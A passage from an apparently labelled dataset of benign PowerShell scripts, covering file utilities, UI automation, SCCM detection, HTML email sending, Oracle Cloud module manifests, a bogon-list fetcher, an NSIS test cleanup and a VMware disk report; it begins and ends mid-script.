(-not (Test-Path $path)) { Write-Error "$path is an invalid path." return $false } $files = @(Get-ChildItem $path) foreach ($file in $files) { if ($file -like $fileglob) { Write-Output $file } if ($file.GetType().FullName -eq 'System.IO.DirectoryInfo') { if ($levels -gt 0) { Get-ChildItemRecurse -path $file.FullName ` -fileglob $fileglob ` -levels ($levels - 1) } } } }
combined_dataset/train/non-malicious/Split-String_2.ps1
Split-String_2.ps1
function Split-String { #.Synopsis # Split a string and execute a scriptblock to give access to the pieces #.Description # Splits a string (by default, on whitespace), and assigns it to $0, and the first 9 words to $1 through $9 ... and then calls the specified scriptblock #.Example # echo "this is one test ff-ff-00 a crazy" | split {$2, $1.ToUpper(), $6, $4, "?"} # # outputs 5 strings: is, THIS, a, test, ? # #.Example # echo "this is one test ff-ff-00 a crazy" | split {$0[-1]} # # outputs the last word in the string: "crazy" # #.Parameter pattern # The regular expression to split on. By default "\\s+" (any number of whitespace characters) #.Parameter action # The scriptblock to execute. By default {$0} which returns the whole split array #.Parameter InputObject # The string to split [CmdletBinding(DefaultParameterSetName="DefaultSplit")] Param( [Parameter(Position=0, ParameterSetName="SpecifiedSplit")] [string]$pattern="\\s+" , [Parameter(Position=0,ParameterSetName="DefaultSplit")] [Parameter(Position=1,ParameterSetName="SpecifiedSplit")] [ScriptBlock]$action={$0} , [Parameter(Mandatory=$true, ValueFromPipeline=$true)] [string]$InputObject ) BEGIN { if(!$pattern){[regex]$re="\\s+"}else{[regex]$re=$pattern} } PROCESS { $0 = $re.Split($InputObject) $1,$2,$3,$4,$5,$6,$7,$8,$9,$n = $0 &$action } } # #This one is v1-compatible # function Split-String { # Param([scriptblock]$action={$0},[regex]$split=" ") # PROCESS { # if($_){ # $0 = $split.Split($_) # $1,$2,$3,$4,$5,$6,$7,$8,$9,$n = $0 # &$action # } # } # }
combined_dataset/train/non-malicious/c29a0542-1603-4048-b8e2-365fa886bbcf.ps1
c29a0542-1603-4048-b8e2-365fa886bbcf.ps1
function Start-ISE () { <# .synopsis Load some file into ISE .Description Load some file into ISE .Parameter fileObjOrFileName file to be loaded .ReturnValue $null .Notes Author: bernd kriszio e-mail: bkriszio@googlemail.com Created: 2008-12-28 Requires: V2 CTP 3 Todo: I do not see the solution using advanced functions for a variable number of arguments Start-ISE .\\foo.ps1 .\\bar.ps1 fails. .Example Start-ISE $profile .Example get-childitem *.ps1 | Start-ISE .Example 'foo.ps1', 'bar.ps1' | Start-ISE #> param( [Parameter(Position = 0, Mandatory=$false, ValueFromPipeline=$True)] $fileObjOrFileName ) PROCESS { if ($fileObjOrFileName -ne $null){ if ($fileObjOrFileName.gettype().Name -eq 'FileInfo'){ & "$PSHome\\powershell_ise.exe" $fileObjOrFileName.Fullname } elseif ($fileObjOrFileName.gettype().Name -eq 'String') { if(Test-path $fileObjOrFileName) { & "$PSHome\\powershell_ise.exe" "$fileObjOrFileName" } else { & "$PSHome\\powershell_ise.exe" "$(pwd)\\$fileObjOrFileName" } } } } <# End{ foreach ($file in $args) { if ($file.gettype().Name -eq 'FileInfo'){ & "$PSHome/powershell_ise.exe" $file.Fullname } elseif ($file.gettype().Name -eq 'String') { & "$PSHome/powershell_ise.exe" "$(pwd)\\$file" } } } #> }
combined_dataset/train/non-malicious/UIAutomation 1.2.ps1
UIAutomation 1.2.ps1
# # # Select-Window Notepad | Remove-Window -passthru # # ## And later ... # # Select-Window Notepad | Select-ChildWindow | Send-Keys "%N" # # ## OR ## # # Select-Window Notepad | Select-ChildWindow | # # Select-Control -title "Do&n't Save" -recurse | Send-Click # # # # # # PS notepad | Select-Window | Select-ChildWindow | %{ New-Object Huddled.Wasp.Window $_ } # # # # cp C:\\Users\\Joel\\Projects\\PowerShell\\Wasp\\trunk\\WASP\\bin\\Debug\\Wasp.dll .\\Modules\\WASP\\ # # Import-Module WASP # function formatter { END { # $input | Format-Table @{l="Text";e={$_.Text.SubString(0,25)}}, ClassName, FrameworkId -Auto # }} Add-Type -AssemblyName UIAutomationClient Add-Type -AssemblyName UIAutomationTypes $SWA = "System.Windows.Automation" Import-Module Accelerators Add-Accelerator AutoElement "$SWA.AutomationElement" -EA SilentlyContinue Add-Accelerator InvokePattern "$SWA.InvokePattern" -EA SilentlyContinue Add-Accelerator ExpandPattern "$SWA.ExpandCollapsePattern" -EA SilentlyContinue Add-Accelerator WindowPattern "$SWA.WindowPattern" -EA SilentlyContinue Add-Accelerator TransformPattern "$SWA.TransformPattern" -EA SilentlyContinue Add-Accelerator ValuePattern "$SWA.ValuePattern" -EA SilentlyContinue Add-Accelerator TextPattern "$SWA.TextPattern" -EA SilentlyContinue Add-Accelerator Condition "$SWA.Condition" -EA SilentlyContinue Add-Accelerator AndCondition "$SWA.TextPattern" -EA SilentlyContinue Add-Accelerator OrCondition "$SWA.TextPattern" -EA SilentlyContinue Add-Accelerator NotCondition "$SWA.TextPattern" -EA SilentlyContinue Add-Accelerator PropertyCondition "$SWA.PropertyCondition" -EA SilentlyContinue Add-Accelerator AutoElementIds "$SWA.AutomationElementIdentifiers" -EA SilentlyContinue Add-Accelerator TransformIds "$SWA.TransformPatternIdentifiers" -EA SilentlyContinue $FalseCondition = [Condition]::FalseCondition $TrueCondition = [Condition]::TrueCondition Add-Type -AssemblyName System.Windows.Forms Add-Accelerator SendKeys System.Windows.Forms.SendKeys -EA SilentlyContinue function New-UIAElement { [CmdletBinding()] PARAM( [Parameter(ValueFromPipeline=$true)] [AutoElement]$Element ) PROCESS { $Element | Add-Member -Name Text -Type ScriptProperty -PassThru -Value { $this.GetCurrentPropertyValue([AutoElementIds]::NameProperty) } | Add-Member -Name ClassName -Type ScriptProperty -Passthru -Value { $this.GetCurrentPropertyValue([AutoElementIds]::ClassNameProperty) } | Add-Member -Name FrameworkId -Type ScriptProperty -Passthru -Value { $this.GetCurrentPropertyValue([AutoElementIds]::FrameworkIdProperty) } | Add-Member -Name ProcessId -Type ScriptProperty -Passthru -Value { $this.GetCurrentPropertyValue([AutoElementIds]::ProcessIdProperty) } | Add-Member -Name ControlType -Type ScriptProperty -Passthru -Value { $this.GetCurrentPropertyValue([AutoElementIds]::LocalizedControlTypeProperty) } } } function Select-Window { [CmdletBinding()] PARAM( [Parameter()] [Alias("Name")] [string]$Text="*" , [Parameter()] [string]$ClassName="*" , [Parameter()] [string]$ControlType="*" , [Parameter()] [switch]$Recurse , [Parameter(ValueFromPipeline=$true)] [AutoElement]$Parent = [AutoElement]::RootElement ) PROCESS { if($Recurse) { $Parent.FindAll( "Descendants", $TrueCondition ) | New-UIAElement | Where-Object { ($_.ClassName -like $ClassName) -AND ($_.Text -like $Text) -AND ($_.ControlType -like $ControlType) } } else { $Parent.FindAll( "Children", $TrueCondition ) | New-UIAElement | Where-Object { ($_.ClassName -like $ClassName) -AND ($_.Text -like $Text) -AND ($_.ControlType -like $ControlType) } } } } function formatter { END { $input | Format-Table @{l="Text";e={$_.Text.SubString(0,25)}}, ClassName, FrameworkId -Auto }} function Invoke-Element { [CmdletBinding()] PARAM( [Parameter(ValueFromPipeline=$true)] [AutoElement]$Target ) PROCESS { $Target.GetCurrentPattern([InvokePattern]::Pattern).Invoke() } } function Set-ElementText { [CmdletBinding()] PARAM( [Parameter()] [string]$Text , [Parameter(ValueFromPipeline=$true)] [AutoElement]$Target ) PROCESS { $Target.SetFocus(); $textPattern = $valuePattern = $null try { $textPattern = $Target.GetCurrentPattern([TextPattern]::Pattern) Write-Host "textPattern:`n$($textPattern | gm)" } catch { } try { $valuePattern = $Target.GetCurrentPattern([ValuePattern]::Pattern) Write-Host "valuePattern:`n$($valuePattern | gm)" } catch { } $Target.SetFocus(); if($valuePattern) { $valuePattern.SetValue( $Text ) } if($textPattern) { [SendKeys]::SendWait("^{HOME}"); [SendKeys]::SendWait("^+{END}"); [SendKeys]::SendWait("{DEL}"); [SendKeys]::SendWait( $Text ) } } }
combined_dataset/train/non-malicious/Detect SCCM 2007.ps1
Detect SCCM 2007.ps1
function global:test-sccmagent { param($PC) [boolean]$result=get-wmiobject -Query "Select * from win32_service where Name = 'CcmExec'" -ComputerName $PC return $result }
combined_dataset/train/non-malicious/Send-HTMLFormattedEmail_5.ps1
Send-HTMLFormattedEmail_5.ps1
################################################## # cmdlets ################################################## #------------------------------------------------- # Send-HTMLFormattedEmail #------------------------------------------------- # Usage: Send-HTMLFormattedEmail -? #------------------------------------------------- function Send-HTMLFormattedEmail { <# .Synopsis Used to send an HTML Formatted Email. .Description Used to send an HTML Formatted Email that is based on an XSLT template. .Parameter To Email address or addresses for whom the message is being sent to. Addresses should be seperated using ;. .Parameter ToDisName Display name for whom the message is being sent to. .Parameter CC Email address if you want CC a recipient. Addresses should be seperated using ;. .Parameter BCC Email address if you want BCC a recipient. Addresses should be seperated using ;. .Parameter From Email address for whom the message comes from. .Parameter FromDisName Display name for whom the message comes from. .Parameter Subject The subject of the email address. .Parameter Content The content of the message (to be inserted into the XSL Template). .Parameter Relay FQDN or IP of the SMTP relay to send the message to. .XSLPath The full path to the XSL template that is to be used. #> param( [Parameter(Mandatory=$True)][String]$To, [Parameter(Mandatory=$True)][String]$ToDisName, [String]$CC, [String]$BCC, [Parameter(Mandatory=$True)][String]$From, [Parameter(Mandatory=$True)][String]$FromDisName, [Parameter(Mandatory=$True)][String]$Subject, [Parameter(Mandatory=$True)][String]$Content, [Parameter(Mandatory=$True)][String]$Relay, [Parameter(Mandatory=$True)][String]$XSLPath ) try { # Load XSL Argument List $XSLArg = New-Object System.Xml.Xsl.XsltArgumentList $XSLArg.Clear() $XSLArg.AddParam("To", $Null, $ToDisName) $XSLArg.AddParam("Content", $Null, $Content) # Load Documents $BaseXMLDoc = New-Object System.Xml.XmlDocument $BaseXMLDoc.LoadXml("<root/>") $XSLTrans = New-Object System.Xml.Xsl.XslCompiledTransform $XSLTrans.Load($XSLPath) #Perform XSL Transform $FinalXMLDoc = New-Object System.Xml.XmlDocument $MemStream = New-Object System.IO.MemoryStream $XMLWriter = [System.Xml.XmlWriter]::Create($MemStream) $XSLTrans.Transform($BaseXMLDoc, $XSLArg, $XMLWriter) $XMLWriter.Flush() $MemStream.Position = 0 # Load the results $FinalXMLDoc.Load($MemStream) $Body = $FinalXMLDoc.Get_OuterXML() # Create Message Object $Message = New-Object System.Net.Mail.MailMessage # Now Populate the Message Object. $Message.Subject = $Subject $Message.Body = $Body $Message.IsBodyHTML = $True # Add From $MessFrom = New-Object System.Net.Mail.MailAddress $From, $FromDisName $Message.From = $MessFrom # Add To $To = $To.Split(";") # Make an array of addresses. $To | foreach {$Message.To.Add((New-Object System.Net.Mail.Mailaddress $_.Trim()))} # Add them to the message object. # Add CC if ($CC){ $CC = $CC.Split(";") # Make an array of addresses. $CC | foreach {$Message.CC.Add((New-Object System.Net.Mail.Mailaddress $_.Trim()))} # Add them to the message object. } # Add BCC if ($BCC){ $BCC = $BCC.Split(";") # Make an array of addresses. $BCC | foreach {$Message.BCC.Add((New-Object System.Net.Mail.Mailaddress $_.Trim()))} # Add them to the message object. } # Create SMTP Client $Client = New-Object System.Net.Mail.SmtpClient $Relay # Send The Message $Client.Send($Message) } catch { throw $_ } } ################################################## # Main ################################################## Export-ModuleMember Send-HTMLFormattedEmail ### XSLT Template Example <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output media-type="xml" omit-xml-declaration="yes" /> <xsl:param name="To"/> <xsl:param name="Content"/> <xsl:template match="/"> <html> <head> <title>My First Formatted Email</title> </head> <body> <div width="400px"> <p>Dear <xsl:value-of select="$To" />,</p> <p></p> <p><xsl:value-of select="$Content" /></p> <p></p> <p><strong>Please do not respond to this email!</strong><br /> An automated system sent this email, if any point you have any questions or concerns please open a help desk ticket.</p> <p></p> <Address> Many thanks from your:<br /> Really Cool IT Team<br /> </Address> </div> </body> </html> </xsl:template> </xsl:stylesheet>
combined_dataset/train/non-malicious/sample_38_69.ps1
sample_38_69.ps1
# # Module manifest for module 'OCI.PSModules.Accessgovernancecp' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Accessgovernancecp.dll' # Version number of this module. ModuleVersion = '77.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'c71dab6b-b390-499f-9d71-506da8082df7' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Accessgovernancecp Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '77.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Accessgovernancecp.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIAccessgovernancecpGovernanceInstance', 'Get-OCIAccessgovernancecpGovernanceInstanceConfiguration', 'Get-OCIAccessgovernancecpGovernanceInstancesList', 'Move-OCIAccessgovernancecpGovernanceInstanceCompartment', 'New-OCIAccessgovernancecpGovernanceInstance', 'Remove-OCIAccessgovernancecpGovernanceInstance', 'Update-OCIAccessgovernancecpGovernanceInstance', 'Update-OCIAccessgovernancecpGovernanceInstanceConfiguration' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Accessgovernancecp' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/4f560e57-408c-430b-a2c5-84a1d6d4c928.ps1
4f560e57-408c-430b-a2c5-84a1d6d4c928.ps1
<# .SYNOPSIS Gets the bogon list. .DESCRIPTION The Get-BogonList script retrieves the bogon prefix list maintained by Team Cymru. A bogon prefix is a route that should never appear in the Internet routing table. A packet routed over the public Internet (not including over VPNs or other tunnels) should never have a source address in a bogon range. These are commonly found as the source addresses of DDoS attacks. Bogons are defined as Martians (private and reserved addresses defined by RFC 1918 and RFC 3330) and netblocks that have not been allocated to a regional internet registry (RIR) by the Internet Assigned Numbers Authority. .PARAMETER Aggregated By default the unaggregated bogon list is retrieved. Use this switch parameter to retrieve the aggregated list. .OUTPUTS PSObject .EXAMPLE Get-BogonList Retrieves the unaggregated bogon list from Team Cymru. .EXAMPLE Get-BogonList -Aggregated Retrieves the aggregated bogon list from Team Cymru. .NOTES Name: Get-BogonList Author: Rich Kusak (rkusak@cbcag.edu) Created: 2010-01-31 Version: 1.0.0 #Requires -Version 2.0 .LINK http://www.team-cymru.org/Services/Bogons/ #> param ( [switch]$Aggregated ) $webClient = New-Object System.Net.WebClient $version = $webClient.DownloadString("http://www.cymru.com/Documents/bogon-list.html") -split "`n" | Where-Object {$_ -cmatch "TITLE"} | ForEach-Object {$_.Remove(0,7).Replace('</TITLE>',"").Trim()} if ($Aggregated) { foreach ($bogon in $webClient.DownloadString("http://www.cymru.com/Documents/bogon-bn-agg.txt") -split "`n" | Where-Object {$_ -notlike $null}) { New-Object PSObject -Property @{$version = $bogon} } } else { foreach ($bogon in $webClient.DownloadString("http://www.cymru.com/Documents/bogon-bn-nonagg.txt") -split "`n" | Where-Object {$_ -notlike $null}) { New-Object PSObject -Property @{$version = $bogon} } }
combined_dataset/train/non-malicious/sample_65_17.ps1
sample_65_17.ps1
<# .SYNOPSIS Clean the NSIS Tests directory .DESCRIPTION This script removes the venv directory and the test-setup.exe .EXAMPLE clean.ps1 .EXAMPLE clean.ps1 #> param( [Parameter(Mandatory=$false)] [Alias("c")] # Don't pretify the output of the Write-Result [Switch] $CICD ) #------------------------------------------------------------------------------- # Script Preferences #------------------------------------------------------------------------------- $ProgressPreference = "SilentlyContinue" $ErrorActionPreference = "Stop" #------------------------------------------------------------------------------- # Script Variables #------------------------------------------------------------------------------- $SCRIPT_DIR = (Get-ChildItem "$($myInvocation.MyCommand.Definition)").DirectoryName $PROJECT_DIR = $(git rev-parse --show-toplevel) $WINDOWS_DIR = "$PROJECT_DIR\pkg\windows" $BUILDENV_DIR = "$WINDOWS_DIR\buildenv" #------------------------------------------------------------------------------- # Script Functions #------------------------------------------------------------------------------- function Write-Result($result, $ForegroundColor="Green") { if ( $CICD ) { Write-Host $result -ForegroundColor $ForegroundColor } else { $position = 80 - $result.Length - [System.Console]::CursorLeft Write-Host -ForegroundColor $ForegroundColor ("{0,$position}$result" -f "") } } #------------------------------------------------------------------------------- # Start the Script #------------------------------------------------------------------------------- Write-Host $("=" * 80) Write-Host "Clean NSIS Test Environment" -ForegroundColor Cyan Write-Host $("-" * 80) #------------------------------------------------------------------------------- # Make sure we're not in a virtual environment #------------------------------------------------------------------------------- if ( $env:VIRTUAL_ENV ) { # I've tried deactivating from the script, but it doesn't work Write-Host "Please deactive the virtual environment" exit } #------------------------------------------------------------------------------- # Remove venv directory #------------------------------------------------------------------------------- if ( Test-Path -Path "$SCRIPT_DIR\venv" ) { Write-Host "Removing venv directory: " -NoNewline Remove-Item -Path "$SCRIPT_DIR\venv" -Recurse -Force if ( Test-Path -Path "$SCRIPT_DIR\venv" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove buildenv directory #------------------------------------------------------------------------------- if ( Test-Path -Path "$BUILDENV_DIR" ) { Write-Host "Removing buildenv directory: " -NoNewline Remove-Item -Path "$BUILDENV_DIR" -Recurse -Force if ( Test-Path -Path "$BUILDENV_DIR" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Make sure processes are not running #------------------------------------------------------------------------------- $processes = "test-setup", "Un", "Un_A", "Un_B", "Un_C", "Un_D", "Un_E", "Un_F", "Un_G" $processes | ForEach-Object { $proc = Get-Process -Name $_ -ErrorAction SilentlyContinue if ( ($null -ne $proc) ) { Write-Host "Killing $($_): " -NoNewline $proc = Get-WmiObject -Class Win32_Process -Filter "Name='$_.exe'" $proc.Terminate() *> $null Start-Sleep -Seconds 5 $proc = Get-Process -Name $_ -ErrorAction SilentlyContinue if ( ($null -eq $proc) ) { Write-Result "Success" -ForegroundColor Green } else { Write-Result "Failed" -ForegroundColor Red exit 1 } } } #------------------------------------------------------------------------------- # Remove test-setup.exe #------------------------------------------------------------------------------- if ( Test-Path -Path "$SCRIPT_DIR\test-setup.exe" ) { Write-Host "Removing test-setup.exe: " -NoNewline Remove-Item -Path "$SCRIPT_DIR\test-setup.exe" -Recurse -Force if ( Test-Path -Path "$SCRIPT_DIR\test-setup.exe" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove custom_conf #------------------------------------------------------------------------------- if ( Test-Path -Path "$SCRIPT_DIR\custom_conf" ) { Write-Host "Removing custom_conf: " -NoNewline Remove-Item -Path "$SCRIPT_DIR\custom_conf" -Recurse -Force if ( Test-Path -Path "$SCRIPT_DIR\custom_conf" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove the salt-minion service #------------------------------------------------------------------------------- if ( $(Get-Service -Name salt-minion -ErrorAction SilentlyContinue).Name ) { Write-Host "Removing salt-minion service" -NoNewline Stop-Service -Name salt-minion $service = Get-WmiObject -Class Win32_Service -Filter "Name='salt-minion'" $service.delete() *> $null if ( $(Get-Service -Name salt-minion -ErrorAction SilentlyContinue).Name ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove Salt Project directory from Program Files #------------------------------------------------------------------------------- if ( Test-Path -Path "$env:ProgramFiles\Salt Project" ) { Write-Host "Removing Salt Project from Program Files: " -NoNewline Remove-Item -Path "$env:ProgramFiles\Salt Project" -Recurse -Force if ( Test-Path -Path "$env:ProgramFiles\Salt Project" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove Salt Project directory from ProgramData #------------------------------------------------------------------------------- if ( Test-Path -Path "$env:ProgramData\Salt Project" ) { Write-Host "Removing Salt Project from ProgramData: " -NoNewline Remove-Item -Path "$env:ProgramData\Salt Project" -Recurse -Force if ( Test-Path -Path "$env:ProgramData\Salt Project" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove Salt Project from Registry #------------------------------------------------------------------------------- if ( Test-Path -Path "HKLM:SOFTWARE\Salt Project" ) { Write-Host "Removing Salt Project from Software: " -NoNewline Remove-Item -Path "HKLM:SOFTWARE\Salt Project" -Recurse -Force if ( Test-Path -Path "HKLM:SOFTWARE\Salt Project" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Remove Salt Minion directory from Registry #------------------------------------------------------------------------------- if ( Test-Path -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Salt Minion" ) { Write-Host "Removing Salt Minion from the Uninstall: " -NoNewline Remove-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Salt Minion" -Recurse -Force if ( Test-Path -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Salt Minion" ) { Write-Result "Failed" -ForegroundColor Red exit 1 } else { Write-Result "Success" -ForegroundColor Green } } #------------------------------------------------------------------------------- # Script Completed #------------------------------------------------------------------------------- Write-Host $("-" * 80) Write-Host "Clean NSIS Test Environment Completed" -ForegroundColor Cyan Write-Host $("=" * 80)
combined_dataset/train/non-malicious/VM Disk Report_1.ps1
VM Disk Report_1.ps1
$VMs = get-vm $Results = @() foreach ($VM in $VMs) { $Result = new-object PSObject $Result | add-member -membertype NoteProperty -name "Name" -value $VM.Name $Result | add-member -membertype NoteProperty -name "Description" -value $VM.Notes $VMDiskCount = 1 get-harddisk $VM | foreach { $disk = $_ $Result | add-member -name "Disk($VMDiskCount)SizeGB" -value ([math]::Round($disk.CapacityKB / 1MB)) -membertype NoteProperty $Result | add-member -name "Disk($VMDiskCount)Type" -value $disk.DiskType -membertype NoteProperty $VMDiskCount++ } $Results += $Result } $Results | select-object * | export-csv -notypeinformation E:\\VCBDiskReport.csv
combined_dataset/train/non-malicious/sample_63_76.ps1
sample_63_76.ps1
# # Module manifest for module 'OCI.PSModules.Resourcemanager' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Resourcemanager.dll' # Version number of this module. ModuleVersion = '88.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '73e0f641-602c-4457-9e79-f05b84ced282' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Resourcemanager Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '88.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Resourcemanager.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIResourcemanagerConfigurationSourceProvider', 'Get-OCIResourcemanagerConfigurationSourceProvidersList', 'Get-OCIResourcemanagerJob', 'Get-OCIResourcemanagerJobAssociatedResourcesList', 'Get-OCIResourcemanagerJobDetailedLogContent', 'Get-OCIResourcemanagerJobLogs', 'Get-OCIResourcemanagerJobLogsContent', 'Get-OCIResourcemanagerJobOutputsList', 'Get-OCIResourcemanagerJobsList', 'Get-OCIResourcemanagerJobTfConfig', 'Get-OCIResourcemanagerJobTfPlan', 'Get-OCIResourcemanagerJobTfState', 'Get-OCIResourcemanagerPrivateEndpoint', 'Get-OCIResourcemanagerPrivateEndpointsList', 'Get-OCIResourcemanagerReachableIp', 'Get-OCIResourcemanagerResourceDiscoveryServicesList', 'Get-OCIResourcemanagerStack', 'Get-OCIResourcemanagerStackAssociatedResourcesList', 'Get-OCIResourcemanagerStackResourceDriftDetailsList', 'Get-OCIResourcemanagerStacksList', 'Get-OCIResourcemanagerStackTfConfig', 'Get-OCIResourcemanagerStackTfState', 'Get-OCIResourcemanagerTemplate', 'Get-OCIResourcemanagerTemplateCategoriesList', 'Get-OCIResourcemanagerTemplateLogo', 'Get-OCIResourcemanagerTemplatesList', 'Get-OCIResourcemanagerTemplateTfConfig', 'Get-OCIResourcemanagerTerraformVersionsList', 'Get-OCIResourcemanagerWorkRequest', 'Get-OCIResourcemanagerWorkRequestErrorsList', 'Get-OCIResourcemanagerWorkRequestLogsList', 'Get-OCIResourcemanagerWorkRequestsList', 'Invoke-OCIResourcemanagerDetectStackDrift', 'Move-OCIResourcemanagerConfigurationSourceProviderCompartment', 'Move-OCIResourcemanagerPrivateEndpointCompartment', 'Move-OCIResourcemanagerStackCompartment', 'Move-OCIResourcemanagerTemplateCompartment', 'New-OCIResourcemanagerConfigurationSourceProvider', 'New-OCIResourcemanagerJob', 'New-OCIResourcemanagerPrivateEndpoint', 'New-OCIResourcemanagerStack', 'New-OCIResourcemanagerTemplate', 'Remove-OCIResourcemanagerConfigurationSourceProvider', 'Remove-OCIResourcemanagerPrivateEndpoint', 'Remove-OCIResourcemanagerStack', 'Remove-OCIResourcemanagerTemplate', 'Stop-OCIResourcemanagerJob', 'Update-OCIResourcemanagerConfigurationSourceProvider', 'Update-OCIResourcemanagerJob', 'Update-OCIResourcemanagerPrivateEndpoint', 'Update-OCIResourcemanagerStack', 'Update-OCIResourcemanagerTemplate' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Resourcemanager' # A 